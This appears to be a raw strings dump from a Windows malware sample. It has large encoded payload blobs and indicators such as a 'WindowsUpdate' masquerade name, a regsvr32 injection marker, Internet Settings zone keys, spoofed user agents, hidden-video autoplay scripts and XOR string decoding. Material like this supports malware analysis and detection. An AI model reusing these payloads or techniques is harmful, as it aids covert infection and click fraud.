OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN mIFAT8fXXaIXDUBIy12Pa7W2cJQTgGvC0KO4Z8D5Q1XNS2/uZum9rLEICYOgm/uSfXNrWcrXL67xe3ES/R1im56DGnpzcD79NLxL08H7gXnk4IIGAU4hPLZmmLkiZdSK3ea9J8NLKwIZIGQ5GtCYIhNo8mswzlWe9HCuJvkElVO7Yn4firX/XB0roU 4 7lg5mVGHbYn Cde1V2MF1NG01/0LdhDueGifdOrz/upnRDyYtEA7qWAYQKzTkLRXXoexX4yz9cq6oKaJYxYFneIahOS43IkirG30vhiq29S TDiokA90t1//u9iUC8MeJ54PQ/QHGxU 33lAgQWcxZqV92qxprubwz6CE0aH0wSHG7pZSu5oMJB YAFZ5fCSnrM7jDUVG4j72D5jw2r1Xf 8AZ qDVdkW1jtIBOVU5UcEya3fLYAHNsvrmxxMYy1TyAaEJ7z2h6 OXmyl9bjMQZHu31V39G/DrYWAQL VxL6btazkFp9n2jWGravH9bmxx UVMMlwNoqyrpKRMMKw2/yTs7qd/GXOqKBUiGBQVfVNZ/rSJXBEnmWwT21RpMP/hrF AYwqKRJfbMup1h6Ousk0MTCddz9p1n9 peAAf8565VJFRi7kksOaVEt15YJ2LF4TmU/wcq6P6WAIC2PspbhW7Wu V5 gDjujIbqzreSGBdA/iaZwk2OtJxu2/e3rw6aCHXBywbAOazkvdgWPDXufcHybYGGWGHBkrnfWNzIAkaPCaDVouiMguIXr8KDSG1 4xlQ5x6v8mWkekwNcSstXZH4D1TGyPch2pINQtU56LFJQg3m27IuVDKfzakcOrsbqq6Qixgcq1IIdHX533uSfnOA58SEofj6eaJuetab15SRYn9HJW4Hobv2VAwdyoTxwnshUx0yNUgiQEzvAZzn xhTgaVCN/WAd3/ahucI/ioTaSIF5uJXMCyzokd8k/2YYDVRDIdNzEbUxwLg4H GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX vNcnvT1DOCCKtM6nkr5uXfQO00Ez3lp8qss81ISqaqvYgKhXjOpE4t0ThZ4nu5MjNhAEftZun28J5QM92Fg1sA EvS1WGYOesYnyTmz8y770nhYKU1gY8e/GZvspTsmFOJTLjPuZUOnmmvKWRobkP7JHilnL/XEOR4yzUKO4cpVlTVhFHdn4i0Qn7RACJB5Gc6WLhFPClvQEtPnjfKCC/ST8BN6AJScAh0zPU0X59YHxuT z5kKgAPXXA22AEJ6zNx0hV3ewiy RFxf9c Y6tfIMVqPaTITuFAFdbiiVfGOcyCpTN7XYerPwHfwECzrYKl2jW5NlrL/hhAblyx1hk6s9fqgAu/o4WWPSGpQXNcFC776mAU8bDbNpXofn8E6FDDr u4yEGxvo0T//sSFPe6XSFaqghapw1qfP6Ux2BEi7FAgd5nTrSUx2lwv/wfceypmnNkPyIVsk6ldWavqpqlvIBVS5/gI E 93dGOMQk8K6LCD/ql9cO287As1dvh5/DOJYxf2EAYhJsDkxDXkeot9GR4RYi4c8Lc9 U7liHzFxM 9qy9Xa 9jqWC19zpc/oCGwAmtJhIPAXIHBxZU4G3 pq ftM0xVl2FqGb1t5Zd c9lTRTKUV/5uos67xmcb3c1XfbASM76pi QLxawj/mnyqRxlDKM3pK Gx0CgaNjbbu cABFOlvJOuWliPDcC4mVja/VS3zfDuuwwhiFceS1zCk1h6FwALzKzFgZ1LCl7z 9aukYU06l4jXGe9X3ZLWPFxau4kw4t qc5WeOMwrYM5gx3pOsTjgd8VsZVfxtcSy wYWn9YShV2lca4tssiibvIyva3BaKxn 1bU ai0YWx5bseionczjkQIgrnL8PIz4vuflDIKEt OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

c:\%original file name%.exe path>path inj_ffile>inj_ffile

c:\%original file name%.exe path>path inj_ffile>inj_ffile

regsvr32.exe_304_rwx_00080000_000C6000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2$

IWebBrowser2$

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

5)646[6`6

5)646[6`6

7 7$7(7,707

7 7$7(7,707

:$:):5:::

:$:):5:::

; ;%;,;_;

; ;%;,;_;

=?>'?0?>?

=?>'?0?>?

8 8&8 8}8

8 8&8 8}8

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN 